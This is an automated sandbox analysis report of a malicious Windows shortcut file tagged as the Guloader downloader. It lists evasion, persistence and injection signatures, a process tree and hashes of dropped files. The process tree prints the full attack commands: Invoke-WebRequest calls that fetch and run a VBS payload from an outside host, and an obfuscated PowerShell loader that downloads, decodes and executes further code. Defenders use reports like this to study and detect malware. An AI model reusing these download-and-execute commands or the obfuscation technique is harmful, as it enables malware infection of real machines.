Analysis
-
max time kernel
147s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
11-03-2023 03:35
Static task
static1
Behavioral task
behavioral1
Sample
Doc065754.lnk
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Doc065754.lnk
Resource
win10v2004-20230220-en
General
-
Target
Doc065754.lnk
-
Size
2KB
-
MD5
f4aa46ca2856c7f137ca9e95b255c001
-
SHA1
a71f7cec83d329c3444dcc9cf53181689ac02227
-
SHA256
86a3eea0abb10bdcac6a00b9bdf1d76a408fbdd27db8be389757e069a2855f11
-
SHA512
e207a15a14acdfd40e6edbff9d96f2e8a460e954768da45d6d5de3a78fec04a5758261a92f3696a694fa7fba55faf0fbc1222d7276e3bc238723e3321556093a
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 14 3924 powershell.exe 20 4352 WScript.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows\CurrentVersion\Run ieinstal.exe Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rundvisn163 = "%TORO% -w 1 $Unludicrou=(Get-ItemProperty -Path 'HKCU:\\Wreak\\').Stemningsb52;%TORO% ($Unludicrou)" ieinstal.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2444 ieinstal.exe 2444 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 384 powershell.exe 2444 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 384 set thread context of 2444 384 powershell.exe 110 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\Tepoler.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3924 powershell.exe 3924 powershell.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 1076 powershell.exe 1076 powershell.exe 384 powershell.exe 384 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeDebugPrivilege 384 powershell.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 4972 AcroRd32.exe 2444 ieinstal.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1524 wrote to memory of 4524 1524 cmd.exe 85 PID 1524 wrote to memory of 4524 1524 cmd.exe 85 PID 4524 wrote to memory of 3924 4524 WScript.exe 87 PID 4524 wrote to memory of 3924 4524 WScript.exe 87 PID 3924 wrote to memory of 4352 3924 powershell.exe 88 PID 3924 wrote to memory of 4352 3924 powershell.exe 88 PID 3924 wrote to memory of 4972 3924 powershell.exe 89 PID 3924 wrote to memory of 4972 3924 powershell.exe 89 PID 3924 wrote to memory of 4972 3924 powershell.exe 89 PID 4352 wrote to memory of 1076 4352 WScript.exe 93 PID 4352 wrote to memory of 1076 4352 WScript.exe 93 PID 1076 wrote to memory of 384 1076 powershell.exe 95 PID 1076 wrote to memory of 384 1076 powershell.exe 95 PID 1076 wrote to memory of 384 1076 powershell.exe 95 PID 4972 wrote to memory of 4436 4972 AcroRd32.exe 96 PID 4972 wrote to memory of 4436 4972 AcroRd32.exe 96 PID 4972 wrote to memory of 4436 4972 AcroRd32.exe 96 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 3244 4436 RdrCEF.exe 98 PID 4436 wrote to memory of 2768 4436 RdrCEF.exe 99 PID 4436 wrote to memory of 2768 4436 RdrCEF.exe 99 PID 4436 wrote to memory of 2768 4436 RdrCEF.exe 99 PID 4436 wrote to memory of 2768 4436 RdrCEF.exe 99 PID 4436 wrote to memory of 2768 4436 RdrCEF.exe 99 PID 4436 wrote to memory of 2768 4436 RdrCEF.exe 99
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Doc065754.lnk1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\localhost\c$\Windows\System32\SyncAppvPublishingServer.vbs" n; Invoke-WebRequest http://0xC2.11808979/sara/Vejlensisk90.vbs -OutFile C:\Windows\Tasks\Tepoler.vbs; C:\Windows\Tasks\Tepoler.vbs; Invoke-WebRequest http://0xC2.11808979/sara/info.pdf -OutFile C:\Users\Public\info1.pdf; C:\Users\Public\info1.pdf2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; Invoke-WebRequest http://0xC2.11808979/sara/Vejlensisk90.vbs -OutFile C:\Windows\Tasks\Tepoler.vbs; C:\Windows\Tasks\Tepoler.vbs; Invoke-WebRequest http://0xC2.11808979/sara/info.pdf -OutFile C:\Users\Public\info1.pdf; C:\Users\Public\info1.pdf}3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Tepoler.vbs"4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"6⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:384 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"7⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2444
-
-
-
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\info1.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D66A67A5DAE5B92DF42917DD0E9FBA7C --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:3244
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=13329A1430DC9510B5B06D2CB41556BE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=13329A1430DC9510B5B06D2CB41556BE --renderer-client-id=2 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job /prefetch:16⤵PID:2768
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FA4D163C1D99AE24BF572CAE41B12B83 --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:1260
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7935409F9667B3A661D56EB775ADFA50 --mojo-platform-channel-handle=1968 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:3084
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BD96FFBD2770EBF582C8734039C77AEA --mojo-platform-channel-handle=1980 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:4900
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2628
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD5d6ea9069821871f3e6814b183afa9b2b
SHA1edd16a0b0085d7e2f2238a9a085215ebba2e5bee
SHA25687a0715cf86edfd9148324be550bf3fe346cccdb9562e767bf9f4f353711c26c
SHA5126b93e650cb851f98aebe2649762f489e298cc9df3e98ac367824aad51ae435ecf9eb135cad5d4ef5b468209e4e6d55ebbf3efc423fd1233b15bc8b1a4d5d9aa5
-
Filesize
3KB
MD554eea9572b8a1295c4226dd63cadef78
SHA11572cc403c755aa7faeb0ee2e795d449e61d485f
SHA25647b23fd79d8b2504103e2ffbd3866956a332f4c6d37625195ca0f5ab76a39ee3
SHA512ca125313f150c27926efd0832f81964c3a6a72a42fa7a4bb9fb8579661d26b6b29ee621683b7be0c84371ce4b3791dcf9fd9da0836fb67c7dd331012dbd48809
-
Filesize
1KB
MD5b3816ba18b06cb5984eed639e37d4512
SHA158bb6442fb2d98d8e7fa984b3324253e184cf488
SHA256afd25ba7facf64b22ec5c87d409fd27c40f9648536fed4947b0dbf9f8c114ff5
SHA5127bd27315fb26e62b7ce70211cb77043541fac0b3910ef53ee38725bf19595b37b7fd205c09e14116b6f1e3e0733db45e8b5561e4d91cba4f1fa1e138c9843098
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.5MB
MD54c8c59e6ceb46ab5868966fba52a300c
SHA1fb801fb5394e9ec9e2be1d38ad0ee63d25344418
SHA2566e641de68bfd6ab98e297704ab27f784cde401eaaa2d3f7d8653553c60f977da
SHA512b008f519506331de8a2da145db7a6043cf2ab87ed7edce6845cd045fe7cc5795e92e2992ad88af0b174d77ec49511430af939f401c1e40828bdf753137710005
-
Filesize
34KB
MD55794e47d892a3cab512697ca7dc223f4
SHA191f1ac9d1f3209bc5d1bc790319c3675d5a201ed
SHA256ffe477577469c87c606e0cbd9d0da68446cd8d895e4f4ab0a083f0a05ac8ab20
SHA5123699ec735f33e5b9c2c2d5b18ee75e15b736205adf65db8d30df0b56e7c5b0054f73d1eeb6f01e0e85aacbc5ea6cd004bd90c3f8c84b18db5cdf6ee3c2a1d228